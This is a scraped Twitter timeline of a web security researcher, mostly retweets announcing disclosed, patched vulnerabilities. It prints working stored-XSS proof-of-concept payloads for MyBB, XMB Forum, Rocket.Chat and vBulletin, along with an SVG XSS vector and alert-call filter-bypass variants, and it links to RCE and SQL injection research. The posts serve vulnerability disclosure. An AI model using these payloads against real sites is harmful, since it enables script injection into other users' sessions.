Tweets
- Tweets, current page.
- Tweets & replies
- Media
You blocked @Psych0tr1a
Are you sure you want to view these Tweets? Viewing Tweets won't unblock @Psych0tr1a
-
Psych0tr1a Retweeted
I recently found a vulnerability in PHP that allows you to circumvent filter_var() in some cases! Because the PHP team is not responding, I decided to post it. Guess what the input should be in the picture below! My post is at https://pwning.systems/posts/php_filter_var_shenanigans/ …
pic.twitter.com/XBsUixo4bE
Thanks. Twitter will use this info to make your timeline better. UndoUndo -
Psych0tr1a Retweeted
It's the second year in a row, our research was voted into the "Top 10 web hacking techniques"! (2021) Our sincere gratitude goes out to the community and the
@PortSwiggerRes panel. Read the research by Igor Sak-Sakovskiy: https://swarm.ptsecurity.com/fuzzing-for-xss-via-nested-parsers-condition/ …Thanks. Twitter will use this info to make your timeline better. UndoUndo -
Psych0tr1a Retweeted
Here's how to use it without xlink:href: <svg><use id=x><animate attributeName="href" values="data:image/svg+xml,<svg id='x' xmlns='http://www.w3.org/2000/svg'><image href='1' onerror='alert(1)' /></svg>
#x" /></use>Show this threadThanks. Twitter will use this info to make your timeline better. UndoUndo -
Psych0tr1a Retweeted
New article "Fuzzing for XSS via nested parsers condition" by our researcher @Psych0tr1a. This techniques allowed us to find a bunch of vulnerabilities in popular web products that no one had noticed before! https://swarm.ptsecurity.com/fuzzing-for-xss-via-nested-parsers-condition/ …Thanks. Twitter will use this info to make your timeline better. UndoUndo -
Psych0tr1a Retweeted
PoC for a stored XSS in XMB Forum (CVE-2021-29399). The vulnerability was found by our researcher @Psych0tr1a. Payload: [url]http://a[url=http://onmouseover=alert(1)//]a[/url][/url] Advisory: https://forums.xmbforum2.com/viewthread.php?tid=777105 …pic.twitter.com/68FF2iFuBK
Thanks. Twitter will use this info to make your timeline better. UndoUndo -
Psych0tr1a Retweeted
PoC for a stored XSS in MyBB < 1.8.25 (CVE-2021-27279). The vulnerability was found by our researcher Igor Sak-Sakovskiy.
Payload: [email]a@a.a?[email=a@a.a? onmouseover=alert(1) a]a[/email][/email]
Advisory: https://github.com/mybb/mybb/security/advisories/GHSA-6483-hcpp-p75w …pic.twitter.com/eHodNO7KZn
Thanks. Twitter will use this info to make your timeline better. UndoUndo -
Psych0tr1a Retweeted
PoC for a stored XSS in http://Rocket.Chat (CVE-2021-22886). The vulnerability was found by our researcher Igor Sak-Sakovskiy. Payload: [ ](http://www.google.com ) http://www.google.com/pa <http://google.com/onmouseover=alert(1) …; a|Text>th/apic.twitter.com/pUeWaDSP4j
Thanks. Twitter will use this info to make your timeline better. UndoUndo -
Psych0tr1a Retweeted
The persistent XSS in any message in vBulletin! Patched from 13 Apr 2021. The vulnerability was found by our researcher @Psych0tr1a. PoC: [VIDEO="aaa;000"]a[FONT="a onmouseover=alert(location) a"]a[/FONT]a[/VIDEO] Advisory: https://www.vbulletin.org/forum/showthread.php?t=328715 …pic.twitter.com/w1s4apFlbY
Show this threadThanks. Twitter will use this info to make your timeline better. UndoUndo -
Psych0tr1a Retweeted
Some more function calls variants by
@hahwul alert.bind()(1) alert.valueOf()(1) Reflect.apply(alert, null, [1]) Promise.all([1]).then(alert)Thanks. Twitter will use this info to make your timeline better. UndoUndo -
Just a RCE in WinRAR, nothing interesting
https://twitter.com/ptswarm/status/1450824959765397505 …
Thanks. Twitter will use this info to make your timeline better. UndoUndo -
Psych0tr1a Retweeted
RCE on a backend IIS server via file upload with an atypical file extension.
More community curated payloads can be found at https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Extension%20ASP …
#tipstoknowpic.twitter.com/jV5X3H9NRr
Thanks. Twitter will use this info to make your timeline better. UndoUndo -
Psych0tr1a Retweeted
MyBB fixed a Persistent XSS (CVE-2021-27279) in MyBB < 1.8.25 found by our researcher Igor Sak-Sakovskiy. RCE is possible when chained with CVE-2021-27890, reported by Simon Scannell & Carl Smith. Advisory: https://mybb.com/versions/1.8.25/ …pic.twitter.com/CYeN4grpDf
Show this threadThanks. Twitter will use this info to make your timeline better. UndoUndo -
Psych0tr1a Retweeted
Я и мы (Positive Technologies) ищем в специалистов на направления анализа защищенности веба, финансовых приложений и мобилок
Show this threadThanks. Twitter will use this info to make your timeline better. UndoUndo -
Thanks. Twitter will use this info to make your timeline better. UndoUndo
-
Thanks. Twitter will use this info to make your timeline better. UndoUndo
-
Psych0tr1a Retweeted
http://Rocket.Chat fixed a persistent XSS found by our researcher Igor Sak-Sakovskiy. The vulnerability was triggered by sending a text message, resulting in an arbitrary file read or RCE on the recipient's desktop system. https://hackerone.com/reports/1014459 pic.twitter.com/vfFHCGnFiR
Thanks. Twitter will use this info to make your timeline better. UndoUndo -
Hi
@vBulletin. I want to publish critical vulnerability. Can you contact me?Show this threadThanks. Twitter will use this info to make your timeline better. UndoUndo -
Psych0tr1a Retweeted
New gadget chain for deserialization in Zend Framework applications. Triggers on __destruct(), gives RCE and works in PHP 7. https://gist.github.com/YDyachenko/6f60709ce0fc346d0cc0252e07c6aa38 …
#ptswarmTechniquespic.twitter.com/Ns2XKoPiKh
Thanks. Twitter will use this info to make your timeline better. UndoUndo -
Psych0tr1a Retweeted
Advanced MSSQL Injection Tricks
New DNS Out-Of-Band vector in SELECT statement
Quick exploitation: Get all table data in one query
Read local files in SELECT statement
and more!
Read the article: https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/ …Thanks. Twitter will use this info to make your timeline better. UndoUndo -
Psych0tr1a Retweeted
mXSS vulnerability in AngularJS, nice finding by
@pwntesterhttps://bit.ly/2YK9Tq2Thanks. Twitter will use this info to make your timeline better. UndoUndo
Loading seems to be taking a while.
Twitter may be over capacity or experiencing a momentary hiccup. Try again or visit Twitter Status for more information.
